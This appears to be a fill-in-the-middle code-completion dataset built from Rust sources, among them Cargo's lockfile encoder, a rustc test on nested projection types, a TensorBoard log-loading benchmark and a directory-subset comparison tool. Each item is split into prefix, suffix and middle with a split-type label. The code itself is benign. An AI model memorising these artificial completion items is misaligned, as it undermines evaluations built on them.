for id in ids.iter() {
register_pkg(id);
}
}
{
let mut add_dependencies = |id: &PackageId, pkg: &EncodableDependency|
-> CargoResult<()> {
if let Some(ref replace) = pkg.replace {
let replace = try!(id2pkgid(replace));
let replace_precise = tmp.get(&replace).map(|p| {
replace.with_precise(p.clone())
}).unwrap_or(replace);
replacements.insert(id.clone(), replace_precise);
assert!(pkg.dependencies.is_none());
return Ok(())
}
let deps = match pkg.dependencies {
Some(ref deps) => deps,
None => return Ok(()),
};
for edge in deps.iter() {
let to_depend_on = try!(id2pkgid(edge));
let precise_pkgid =
tmp.get(&to_depend_on)
.map(|p| to_depend_on.with_precise(p.clone()))
.unwrap_or(to_depend_on.clone());
g.link(id.clone(), precise_pkgid);
}
Ok(())
};
try!(add_dependencies(&root, &self.root));
for (id, pkg) in ids.iter().zip(packages) {
try!(add_dependencies(id, pkg));
}
}
Ok(Resolve {
graph: g,
root: root,
features: HashMap::new(),
metadata: self.metadata.clone(),
replacements: replacements,
})
}
}
fn build_path_deps(ws: &Workspace) -> HashMap<String, SourceId> {
// If a crate is *not* a path source, then we're probably in a situation
// such as `cargo install` with a lock file from a remote dependency. In
// that case we don't need to fixup any path dependencies (as they're not
// actually path dependencies any more), so we ignore them.
let members = ws.members().filter(|p| {
p.package_id().source_id().is_path()
}).collect::<Vec<_>>();
let mut ret = HashMap::new();
for member in members.iter() {
ret.insert(member.package_id().name().to_string(),
member.package_id().source_id().clone());
}
for member in members.iter() {
build(member, ws.config(), &mut ret);
}
return ret;
fn build(pkg: &Package,
config: &Config,
ret: &mut HashMap<String, SourceId>) {
let deps = pkg.dependencies()
.iter()
.filter(|d|!ret.contains_key(d.name()))
.map(|d| d.source_id())
.filter(|id| id.is_path())
.filter_map(|id| id.url().to_file_path().ok())
.map(|path| path.join("Cargo.toml"))
.filter_map(|path| Package::for_path(&path, config).ok())
.collect::<Vec<_>>();
for pkg in deps {
ret.insert(pkg.name().to_string(),
pkg.package_id().source_id().clone());
build(&pkg, config, ret);
}
}
}
fn to_package_id(name: &str,
version: &str,
source: Option<&SourceId>,
default_source: &SourceId,
path_sources: &HashMap<String, SourceId>)
-> CargoResult<PackageId> {
let source = source.or(path_sources.get(name)).unwrap_or(default_source);
PackageId::new(name, version, source)
}
#[derive(RustcEncodable, RustcDecodable, Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodableDependency {
name: String,
version: String,
source: Option<SourceId>,
dependencies: Option<Vec<EncodablePackageId>>,
replace: Option<EncodablePackageId>,
}
#[derive(Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodablePackageId {
name: String,
version: String,
source: Option<SourceId>
}
impl Encodable for EncodablePackageId {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut out = format!("{} {}", self.name, self.version);
if let Some(ref s) = self.source {
out.push_str(&format!(" ({})", s.to_url()));
}
out.encode(s)
}
}
impl Decodable for EncodablePackageId {
fn decode<D: Decoder>(d: &mut D) -> Result<EncodablePackageId, D::Error> {
let string: String = try!(Decodable::decode(d));
let regex = Regex::new(r"^([^ ]+) ([^ ]+)(?: \(([^\)]+)\))?$").unwrap();
let captures = regex.captures(&string)
.expect("invalid serialized PackageId");
let name = captures.at(1).unwrap();
let version = captures.at(2).unwrap();
let source = captures.at(3);
let source_id = source.map(|s| SourceId::from_url(s));
Ok(EncodablePackageId {
name: name.to_string(),
version: version.to_string(),
source: source_id
})
}
}
impl Encodable for Resolve {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut ids: Vec<&PackageId> = self.graph.iter().collect();
ids.sort();
let encodable = ids.iter().filter_map(|&id| {
if self.root == *id { return None; }
Some(encodable_resolve_node(id, self))
}).collect::<Vec<EncodableDependency>>();
EncodableResolve {
package: Some(encodable),
root: encodable_resolve_node(&self.root, self),
metadata: self.metadata.clone(),
}.encode(s)
}
}
fn encodable_resolve_node(id: &PackageId, resolve: &Resolve)
-> EncodableDependency
|
EncodableDependency {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
dependencies: deps,
replace: replace,
}
}
fn encodable_package_id(id: &PackageId) -> EncodablePackageId {
let source = if id.source_id().is_path() {
None
} else {
Some(id.source_id().with_precise(None))
};
EncodablePackageId {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
}
}
|
{
let (replace, deps) = match resolve.replacement(id) {
Some(id) => {
(Some(encodable_package_id(id)), None)
}
None => {
let mut deps = resolve.graph.edges(id)
.into_iter().flat_map(|a| a)
.map(encodable_package_id)
.collect::<Vec<_>>();
deps.sort();
(None, Some(deps))
}
};
let source = if id.source_id().is_path() {
None
} else {
Some(id.source_id().clone())
};
|
identifier_body
|
encode.rs
|
use std::collections::{HashMap, BTreeMap};
use regex::Regex;
use rustc_serialize::{Encodable, Encoder, Decodable, Decoder};
use core::{Package, PackageId, SourceId, Workspace};
use util::{CargoResult, Graph, Config};
use super::Resolve;
#[derive(RustcEncodable, RustcDecodable, Debug)]
pub struct EncodableResolve {
package: Option<Vec<EncodableDependency>>,
root: EncodableDependency,
metadata: Option<Metadata>,
}
pub type Metadata = BTreeMap<String, String>;
impl EncodableResolve {
pub fn to_resolve(&self, ws: &Workspace) -> CargoResult<Resolve> {
let path_deps = build_path_deps(ws);
let default = try!(ws.current()).package_id().source_id();
let mut g = Graph::new();
let mut tmp = HashMap::new();
let mut replacements = HashMap::new();
let packages = Vec::new();
let packages = self.package.as_ref().unwrap_or(&packages);
let id2pkgid = |id: &EncodablePackageId| {
to_package_id(&id.name, &id.version, id.source.as_ref(),
default, &path_deps)
};
let dep2pkgid = |dep: &EncodableDependency| {
to_package_id(&dep.name, &dep.version, dep.source.as_ref(),
default, &path_deps)
};
let root = try!(dep2pkgid(&self.root));
let ids = try!(packages.iter().map(&dep2pkgid)
.collect::<CargoResult<Vec<_>>>());
{
let mut register_pkg = |pkgid: &PackageId| {
let precise = pkgid.source_id().precise()
.map(|s| s.to_string());
assert!(tmp.insert(pkgid.clone(), precise).is_none(),
"a package was referenced twice in the lockfile");
g.add(pkgid.clone(), &[]);
};
register_pkg(&root);
for id in ids.iter() {
register_pkg(id);
}
}
{
let mut add_dependencies = |id: &PackageId, pkg: &EncodableDependency|
-> CargoResult<()> {
if let Some(ref replace) = pkg.replace {
let replace = try!(id2pkgid(replace));
let replace_precise = tmp.get(&replace).map(|p| {
replace.with_precise(p.clone())
}).unwrap_or(replace);
replacements.insert(id.clone(), replace_precise);
assert!(pkg.dependencies.is_none());
return Ok(())
}
let deps = match pkg.dependencies {
Some(ref deps) => deps,
None => return Ok(()),
};
for edge in deps.iter() {
let to_depend_on = try!(id2pkgid(edge));
let precise_pkgid =
tmp.get(&to_depend_on)
.map(|p| to_depend_on.with_precise(p.clone()))
.unwrap_or(to_depend_on.clone());
g.link(id.clone(), precise_pkgid);
}
Ok(())
};
try!(add_dependencies(&root, &self.root));
for (id, pkg) in ids.iter().zip(packages) {
try!(add_dependencies(id, pkg));
}
}
Ok(Resolve {
graph: g,
root: root,
features: HashMap::new(),
metadata: self.metadata.clone(),
replacements: replacements,
})
}
}
fn build_path_deps(ws: &Workspace) -> HashMap<String, SourceId> {
// If a crate is *not* a path source, then we're probably in a situation
// such as `cargo install` with a lock file from a remote dependency. In
// that case we don't need to fixup any path dependencies (as they're not
// actually path dependencies any more), so we ignore them.
let members = ws.members().filter(|p| {
p.package_id().source_id().is_path()
}).collect::<Vec<_>>();
let mut ret = HashMap::new();
for member in members.iter() {
ret.insert(member.package_id().name().to_string(),
member.package_id().source_id().clone());
}
for member in members.iter() {
build(member, ws.config(), &mut ret);
}
return ret;
fn build(pkg: &Package,
config: &Config,
ret: &mut HashMap<String, SourceId>) {
let deps = pkg.dependencies()
.iter()
.filter(|d|!ret.contains_key(d.name()))
.map(|d| d.source_id())
.filter(|id| id.is_path())
.filter_map(|id| id.url().to_file_path().ok())
.map(|path| path.join("Cargo.toml"))
.filter_map(|path| Package::for_path(&path, config).ok())
.collect::<Vec<_>>();
for pkg in deps {
ret.insert(pkg.name().to_string(),
pkg.package_id().source_id().clone());
build(&pkg, config, ret);
}
}
}
fn to_package_id(name: &str,
version: &str,
source: Option<&SourceId>,
default_source: &SourceId,
path_sources: &HashMap<String, SourceId>)
-> CargoResult<PackageId> {
let source = source.or(path_sources.get(name)).unwrap_or(default_source);
PackageId::new(name, version, source)
}
#[derive(RustcEncodable, RustcDecodable, Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodableDependency {
name: String,
version: String,
source: Option<SourceId>,
dependencies: Option<Vec<EncodablePackageId>>,
replace: Option<EncodablePackageId>,
}
#[derive(Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodablePackageId {
name: String,
version: String,
source: Option<SourceId>
}
impl Encodable for EncodablePackageId {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut out = format!("{} {}", self.name, self.version);
if let Some(ref s) = self.source {
out.push_str(&format!(" ({})", s.to_url()));
}
out.encode(s)
}
}
impl Decodable for EncodablePackageId {
fn decode<D: Decoder>(d: &mut D) -> Result<EncodablePackageId, D::Error> {
let string: String = try!(Decodable::decode(d));
let regex = Regex::new(r"^([^ ]+) ([^ ]+)(?: \(([^\)]+)\))?$").unwrap();
let captures = regex.captures(&string)
.expect("invalid serialized PackageId");
let name = captures.at(1).unwrap();
let version = captures.at(2).unwrap();
let source = captures.at(3);
let source_id = source.map(|s| SourceId::from_url(s));
Ok(EncodablePackageId {
name: name.to_string(),
version: version.to_string(),
source: source_id
})
}
}
impl Encodable for Resolve {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut ids: Vec<&PackageId> = self.graph.iter().collect();
ids.sort();
let encodable = ids.iter().filter_map(|&id| {
if self.root == *id { return None; }
Some(encodable_resolve_node(id, self))
}).collect::<Vec<EncodableDependency>>();
EncodableResolve {
package: Some(encodable),
root: encodable_resolve_node(&self.root, self),
metadata: self.metadata.clone(),
}.encode(s)
}
}
fn encodable_resolve_node(id: &PackageId, resolve: &Resolve)
-> EncodableDependency {
let (replace, deps) = match resolve.replacement(id) {
Some(id) => {
(Some(encodable_package_id(id)), None)
}
None => {
let mut deps = resolve.graph.edges(id)
.into_iter().flat_map(|a| a)
.map(encodable_package_id)
.collect::<Vec<_>>();
deps.sort();
(None, Some(deps))
}
};
let source = if id.source_id().is_path()
|
else {
Some(id.source_id().clone())
};
EncodableDependency {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
dependencies: deps,
replace: replace,
}
}
fn encodable_package_id(id: &PackageId) -> EncodablePackageId {
let source = if id.source_id().is_path() {
None
} else {
Some(id.source_id().with_precise(None))
};
EncodablePackageId {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
}
}
|
{
None
}
|
conditional_block
|
encode.rs
|
use std::collections::{HashMap, BTreeMap};
use regex::Regex;
use rustc_serialize::{Encodable, Encoder, Decodable, Decoder};
use core::{Package, PackageId, SourceId, Workspace};
use util::{CargoResult, Graph, Config};
use super::Resolve;
#[derive(RustcEncodable, RustcDecodable, Debug)]
pub struct EncodableResolve {
package: Option<Vec<EncodableDependency>>,
root: EncodableDependency,
metadata: Option<Metadata>,
}
pub type Metadata = BTreeMap<String, String>;
impl EncodableResolve {
pub fn to_resolve(&self, ws: &Workspace) -> CargoResult<Resolve> {
let path_deps = build_path_deps(ws);
let default = try!(ws.current()).package_id().source_id();
let mut g = Graph::new();
let mut tmp = HashMap::new();
let mut replacements = HashMap::new();
let packages = Vec::new();
let packages = self.package.as_ref().unwrap_or(&packages);
let id2pkgid = |id: &EncodablePackageId| {
to_package_id(&id.name, &id.version, id.source.as_ref(),
default, &path_deps)
};
let dep2pkgid = |dep: &EncodableDependency| {
to_package_id(&dep.name, &dep.version, dep.source.as_ref(),
default, &path_deps)
};
let root = try!(dep2pkgid(&self.root));
let ids = try!(packages.iter().map(&dep2pkgid)
.collect::<CargoResult<Vec<_>>>());
{
let mut register_pkg = |pkgid: &PackageId| {
let precise = pkgid.source_id().precise()
.map(|s| s.to_string());
assert!(tmp.insert(pkgid.clone(), precise).is_none(),
"a package was referenced twice in the lockfile");
g.add(pkgid.clone(), &[]);
};
register_pkg(&root);
for id in ids.iter() {
register_pkg(id);
}
}
{
let mut add_dependencies = |id: &PackageId, pkg: &EncodableDependency|
-> CargoResult<()> {
if let Some(ref replace) = pkg.replace {
let replace = try!(id2pkgid(replace));
let replace_precise = tmp.get(&replace).map(|p| {
replace.with_precise(p.clone())
}).unwrap_or(replace);
replacements.insert(id.clone(), replace_precise);
assert!(pkg.dependencies.is_none());
return Ok(())
}
let deps = match pkg.dependencies {
Some(ref deps) => deps,
None => return Ok(()),
};
for edge in deps.iter() {
let to_depend_on = try!(id2pkgid(edge));
let precise_pkgid =
tmp.get(&to_depend_on)
.map(|p| to_depend_on.with_precise(p.clone()))
.unwrap_or(to_depend_on.clone());
g.link(id.clone(), precise_pkgid);
}
Ok(())
};
try!(add_dependencies(&root, &self.root));
for (id, pkg) in ids.iter().zip(packages) {
try!(add_dependencies(id, pkg));
}
}
Ok(Resolve {
graph: g,
root: root,
features: HashMap::new(),
metadata: self.metadata.clone(),
replacements: replacements,
})
}
}
fn build_path_deps(ws: &Workspace) -> HashMap<String, SourceId> {
// If a crate is *not* a path source, then we're probably in a situation
// such as `cargo install` with a lock file from a remote dependency. In
// that case we don't need to fixup any path dependencies (as they're not
// actually path dependencies any more), so we ignore them.
let members = ws.members().filter(|p| {
p.package_id().source_id().is_path()
}).collect::<Vec<_>>();
let mut ret = HashMap::new();
for member in members.iter() {
ret.insert(member.package_id().name().to_string(),
member.package_id().source_id().clone());
}
for member in members.iter() {
build(member, ws.config(), &mut ret);
}
return ret;
fn build(pkg: &Package,
config: &Config,
ret: &mut HashMap<String, SourceId>) {
let deps = pkg.dependencies()
.iter()
.filter(|d|!ret.contains_key(d.name()))
.map(|d| d.source_id())
.filter(|id| id.is_path())
.filter_map(|id| id.url().to_file_path().ok())
.map(|path| path.join("Cargo.toml"))
.filter_map(|path| Package::for_path(&path, config).ok())
.collect::<Vec<_>>();
for pkg in deps {
ret.insert(pkg.name().to_string(),
pkg.package_id().source_id().clone());
build(&pkg, config, ret);
}
}
}
fn to_package_id(name: &str,
version: &str,
source: Option<&SourceId>,
default_source: &SourceId,
path_sources: &HashMap<String, SourceId>)
-> CargoResult<PackageId> {
let source = source.or(path_sources.get(name)).unwrap_or(default_source);
PackageId::new(name, version, source)
}
#[derive(RustcEncodable, RustcDecodable, Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodableDependency {
name: String,
version: String,
source: Option<SourceId>,
dependencies: Option<Vec<EncodablePackageId>>,
replace: Option<EncodablePackageId>,
}
#[derive(Debug, PartialOrd, Ord, PartialEq, Eq)]
pub struct EncodablePackageId {
name: String,
version: String,
source: Option<SourceId>
}
impl Encodable for EncodablePackageId {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut out = format!("{} {}", self.name, self.version);
if let Some(ref s) = self.source {
out.push_str(&format!(" ({})", s.to_url()));
}
out.encode(s)
}
}
impl Decodable for EncodablePackageId {
fn decode<D: Decoder>(d: &mut D) -> Result<EncodablePackageId, D::Error> {
let string: String = try!(Decodable::decode(d));
let regex = Regex::new(r"^([^ ]+) ([^ ]+)(?: \(([^\)]+)\))?$").unwrap();
let captures = regex.captures(&string)
.expect("invalid serialized PackageId");
let name = captures.at(1).unwrap();
let version = captures.at(2).unwrap();
let source = captures.at(3);
let source_id = source.map(|s| SourceId::from_url(s));
Ok(EncodablePackageId {
name: name.to_string(),
version: version.to_string(),
source: source_id
})
}
}
impl Encodable for Resolve {
fn encode<S: Encoder>(&self, s: &mut S) -> Result<(), S::Error> {
let mut ids: Vec<&PackageId> = self.graph.iter().collect();
ids.sort();
let encodable = ids.iter().filter_map(|&id| {
if self.root == *id { return None; }
Some(encodable_resolve_node(id, self))
}).collect::<Vec<EncodableDependency>>();
EncodableResolve {
package: Some(encodable),
root: encodable_resolve_node(&self.root, self),
metadata: self.metadata.clone(),
}.encode(s)
}
}
fn encodable_resolve_node(id: &PackageId, resolve: &Resolve)
-> EncodableDependency {
let (replace, deps) = match resolve.replacement(id) {
Some(id) => {
(Some(encodable_package_id(id)), None)
}
None => {
let mut deps = resolve.graph.edges(id)
.into_iter().flat_map(|a| a)
.map(encodable_package_id)
.collect::<Vec<_>>();
deps.sort();
(None, Some(deps))
}
};
let source = if id.source_id().is_path() {
None
} else {
Some(id.source_id().clone())
};
EncodableDependency {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
dependencies: deps,
replace: replace,
}
}
fn
|
(id: &PackageId) -> EncodablePackageId {
let source = if id.source_id().is_path() {
None
} else {
Some(id.source_id().with_precise(None))
};
EncodablePackageId {
name: id.name().to_string(),
version: id.version().to_string(),
source: source,
}
}
|
encodable_package_id
|
identifier_name
|
associated-types-nested-projections.rs
|
// Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Test that we can resolve nested projection types. Issue #20666.
// pretty-expanded FIXME #23616
#![feature(core)]
use std::slice;
trait Bound {}
impl<'a> Bound for &'a i32 {}
trait IntoIterator {
type Iter: Iterator;
fn into_iter(self) -> Self::Iter;
}
|
fn into_iter(self) -> slice::Iter<'a, T> {
self.iter()
}
}
fn foo<X>(x: X) where
X: IntoIterator,
<<X as IntoIterator>::Iter as Iterator>::Item: Bound,
{
}
fn bar<T, I, X>(x: X) where
T: Bound,
I: Iterator<Item=T>,
X: IntoIterator<Iter=I>,
{
}
fn main() {
foo(&[0, 1, 2]);
bar(&[0, 1, 2]);
}
|
impl<'a, T> IntoIterator for &'a [T; 3] {
type Iter = slice::Iter<'a, T>;
|
random_line_split
|
associated-types-nested-projections.rs
|
// Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Test that we can resolve nested projection types. Issue #20666.
// pretty-expanded FIXME #23616
#![feature(core)]
use std::slice;
trait Bound {}
impl<'a> Bound for &'a i32 {}
trait IntoIterator {
type Iter: Iterator;
fn into_iter(self) -> Self::Iter;
}
impl<'a, T> IntoIterator for &'a [T; 3] {
type Iter = slice::Iter<'a, T>;
fn into_iter(self) -> slice::Iter<'a, T> {
self.iter()
}
}
fn foo<X>(x: X) where
X: IntoIterator,
<<X as IntoIterator>::Iter as Iterator>::Item: Bound,
{
}
fn
|
<T, I, X>(x: X) where
T: Bound,
I: Iterator<Item=T>,
X: IntoIterator<Iter=I>,
{
}
fn main() {
foo(&[0, 1, 2]);
bar(&[0, 1, 2]);
}
|
bar
|
identifier_name
|
associated-types-nested-projections.rs
|
// Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Test that we can resolve nested projection types. Issue #20666.
// pretty-expanded FIXME #23616
#![feature(core)]
use std::slice;
trait Bound {}
impl<'a> Bound for &'a i32 {}
trait IntoIterator {
type Iter: Iterator;
fn into_iter(self) -> Self::Iter;
}
impl<'a, T> IntoIterator for &'a [T; 3] {
type Iter = slice::Iter<'a, T>;
fn into_iter(self) -> slice::Iter<'a, T> {
self.iter()
}
}
fn foo<X>(x: X) where
X: IntoIterator,
<<X as IntoIterator>::Iter as Iterator>::Item: Bound,
{
}
fn bar<T, I, X>(x: X) where
T: Bound,
I: Iterator<Item=T>,
X: IntoIterator<Iter=I>,
|
fn main() {
foo(&[0, 1, 2]);
bar(&[0, 1, 2]);
}
|
{
}
|
identifier_body
|
bench.rs
|
/* Copyright 2020 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
//! Simple benchmark to completely load a logdir and then exit.
use clap::Clap;
use log::info;
use std::path::PathBuf;
use std::sync::Arc;
use std::time::Instant;
use rustboard_core::commit::Commit;
use rustboard_core::logdir::LogdirLoader;
use rustboard_core::{cli::dynamic_logdir::DynLogdir, types::PluginSamplingHint};
#[derive(Clap)]
struct Opts {
#[clap(long)]
logdir: PathBuf,
#[clap(long, default_value = "info")]
log_level: String,
#[clap(long)]
reload_threads: Option<usize>,
// Pair of `--no-checksum` and `--checksum` flags, defaulting to "no checksum".
#[clap(long, multiple_occurrences = true, overrides_with = "checksum")]
#[allow(unused)]
no_checksum: bool,
#[clap(long, multiple_occurrences = true, overrides_with = "no_checksum")]
checksum: bool,
}
fn
|
() {
let opts: Opts = Opts::parse();
init_logging(&opts);
let commit = Commit::new();
let logdir = DynLogdir::new(opts.logdir).expect("DynLogdir::new");
let mut loader = LogdirLoader::new(
&commit,
logdir,
opts.reload_threads.unwrap_or(0),
Arc::new(PluginSamplingHint::default()),
);
loader.checksum(opts.checksum); // if neither `--[no-]checksum` given, defaults to false
info!("Starting load cycle");
let start = Instant::now();
loader.reload();
let end = Instant::now();
info!("Finished load cycle ({:?})", end - start);
}
fn init_logging(opts: &Opts) {
use env_logger::{Builder, Env};
Builder::from_env(Env::default().default_filter_or(&opts.log_level))
.format_timestamp_micros()
.init();
}
|
main
|
identifier_name
|
bench.rs
|
/* Copyright 2020 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
//! Simple benchmark to completely load a logdir and then exit.
use clap::Clap;
use log::info;
use std::path::PathBuf;
use std::sync::Arc;
use std::time::Instant;
use rustboard_core::commit::Commit;
use rustboard_core::logdir::LogdirLoader;
use rustboard_core::{cli::dynamic_logdir::DynLogdir, types::PluginSamplingHint};
#[derive(Clap)]
struct Opts {
#[clap(long)]
logdir: PathBuf,
#[clap(long, default_value = "info")]
log_level: String,
#[clap(long)]
reload_threads: Option<usize>,
// Pair of `--no-checksum` and `--checksum` flags, defaulting to "no checksum".
#[clap(long, multiple_occurrences = true, overrides_with = "checksum")]
#[allow(unused)]
no_checksum: bool,
#[clap(long, multiple_occurrences = true, overrides_with = "no_checksum")]
checksum: bool,
}
fn main() {
let opts: Opts = Opts::parse();
init_logging(&opts);
let commit = Commit::new();
let logdir = DynLogdir::new(opts.logdir).expect("DynLogdir::new");
let mut loader = LogdirLoader::new(
&commit,
logdir,
opts.reload_threads.unwrap_or(0),
Arc::new(PluginSamplingHint::default()),
);
loader.checksum(opts.checksum); // if neither `--[no-]checksum` given, defaults to false
info!("Starting load cycle");
let start = Instant::now();
loader.reload();
let end = Instant::now();
info!("Finished load cycle ({:?})", end - start);
}
fn init_logging(opts: &Opts) {
use env_logger::{Builder, Env};
Builder::from_env(Env::default().default_filter_or(&opts.log_level))
.format_timestamp_micros()
|
.init();
}
|
random_line_split
|
|
bench.rs
|
/* Copyright 2020 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
//! Simple benchmark to completely load a logdir and then exit.
use clap::Clap;
use log::info;
use std::path::PathBuf;
use std::sync::Arc;
use std::time::Instant;
use rustboard_core::commit::Commit;
use rustboard_core::logdir::LogdirLoader;
use rustboard_core::{cli::dynamic_logdir::DynLogdir, types::PluginSamplingHint};
#[derive(Clap)]
struct Opts {
#[clap(long)]
logdir: PathBuf,
#[clap(long, default_value = "info")]
log_level: String,
#[clap(long)]
reload_threads: Option<usize>,
// Pair of `--no-checksum` and `--checksum` flags, defaulting to "no checksum".
#[clap(long, multiple_occurrences = true, overrides_with = "checksum")]
#[allow(unused)]
no_checksum: bool,
#[clap(long, multiple_occurrences = true, overrides_with = "no_checksum")]
checksum: bool,
}
fn main() {
let opts: Opts = Opts::parse();
init_logging(&opts);
let commit = Commit::new();
let logdir = DynLogdir::new(opts.logdir).expect("DynLogdir::new");
let mut loader = LogdirLoader::new(
&commit,
logdir,
opts.reload_threads.unwrap_or(0),
Arc::new(PluginSamplingHint::default()),
);
loader.checksum(opts.checksum); // if neither `--[no-]checksum` given, defaults to false
info!("Starting load cycle");
let start = Instant::now();
loader.reload();
let end = Instant::now();
info!("Finished load cycle ({:?})", end - start);
}
fn init_logging(opts: &Opts)
|
{
use env_logger::{Builder, Env};
Builder::from_env(Env::default().default_filter_or(&opts.log_level))
.format_timestamp_micros()
.init();
}
|
identifier_body
|
|
main.rs
|
#[macro_use]
extern crate serde_derive;
extern crate docopt;
use docopt::Docopt;
use std::fs;
use std::path::PathBuf;
mod directory_files;
use directory_files::*;
mod file_comparable;
mod directory_comparable;
use directory_comparable::*;
/// The Docopt usage string
const USAGE: &'static str = "
Usage: subset [-q | -v] [-t | -n] [-b] <dir1> <dir2>
subset --help
subset lets you compare two directory structures.
We are going to check whether the files in dir1 are a subset of the files in dir2, regardless of directory structure.
We are going to check to see that every file under the directory structure in dir1 must be present somewhere in the dir2 directory structure, regardless of where in the directory structure or definitions of equality.
There are multiple definitions of file equality that you can specify using flags, but the default is a MD5 hash of the contents of the file. It is conceivable that you can define a custom equality strategy that relies on other parameters, such as file name, subdirectory location, metadata, EXIF data, etc. The possibilities are endless.
Common options:
-h, --help Show this usage message.
-q, --quiet Do not print all mappings.
-v, --verbose Print all mappings.
-t, --trivial Will swap out the MD5 comparison for a trivial comparison (everything is equal). (This is to test extensibility.)
-n, --name Will swap out the MD5 comparison for a filename comparison.
-b, --bidirectional Also check whether dir2 is also a subset of dir1 (essentially, set equality) and print out missing lists for both directories.
";
// We should think about moving away from DocOpt soon since it uses RustcDecodable,
// which is deprecated in favor of serde?
/// Parsing comand line arguments here
#[derive(Debug, Deserialize)]
struct
|
{
arg_dir1: String,
arg_dir2: String,
flag_quiet: bool,
flag_verbose: bool,
flag_trivial: bool,
flag_name: bool,
flag_bidirectional: bool,
}
/// This should be the UI layer as much as possible-- it parses the command line arguments,
/// hands it off to our business logic, and then collects the answers back and print them.
fn main() {
let args: Args = Docopt::new(USAGE)
.and_then(|d| d.deserialize())
.unwrap_or_else(|e| e.exit());
println!("Comparing {} with {}", args.arg_dir1, args.arg_dir2);
// Make sure both of our inputs are valid directories
fs::read_dir(&args.arg_dir1).expect("Directory cannot be read!");
fs::read_dir(&args.arg_dir2).expect("Directory cannot be read!");
// Main logic: using dynamic dispatch
// (I don't feel too bad about boxing here because this is essentially a singleton.)
let mut program: Box<DirectoryComparable> = if args.flag_trivial {
Box::new(TrivialDirectoryComparable {})
} else if args.flag_name {
let filename_comparator = file_comparable::FileNameComparable::new();
Box::new(DirectoryComparableWithFileComparable::new(
filename_comparator,
))
} else {
let md5_comparator = file_comparable::Md5Comparable::new();
Box::new(DirectoryComparableWithFileComparable::new(md5_comparator))
};
let superset_dirpath = PathBuf::from(&args.arg_dir2);
// eww... why do we have to coerce these Box types again?
// (again, only two of these Box types in existence so not so bad...)
let mut superset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&superset_dirpath));
let subset_dirpath = PathBuf::from(&args.arg_dir1);
let mut subset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&subset_dirpath)); // mut needed for.by_ref
if args.flag_bidirectional {
// Run program
let (subset_missing_result, superset_missing_result) =
program.report_missing_bidirectional(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in subset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}\n",
subset_missing_result.len(),
superset_dirpath.display()
);
for missing_file in superset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
subset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
superset_missing_result.len(),
subset_dirpath.display()
);
} else {
// Run program
let result = program.report_missing(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
result.len(),
superset_dirpath.display()
);
}
}
|
Args
|
identifier_name
|
main.rs
|
#[macro_use]
extern crate serde_derive;
extern crate docopt;
use docopt::Docopt;
use std::fs;
use std::path::PathBuf;
mod directory_files;
use directory_files::*;
mod file_comparable;
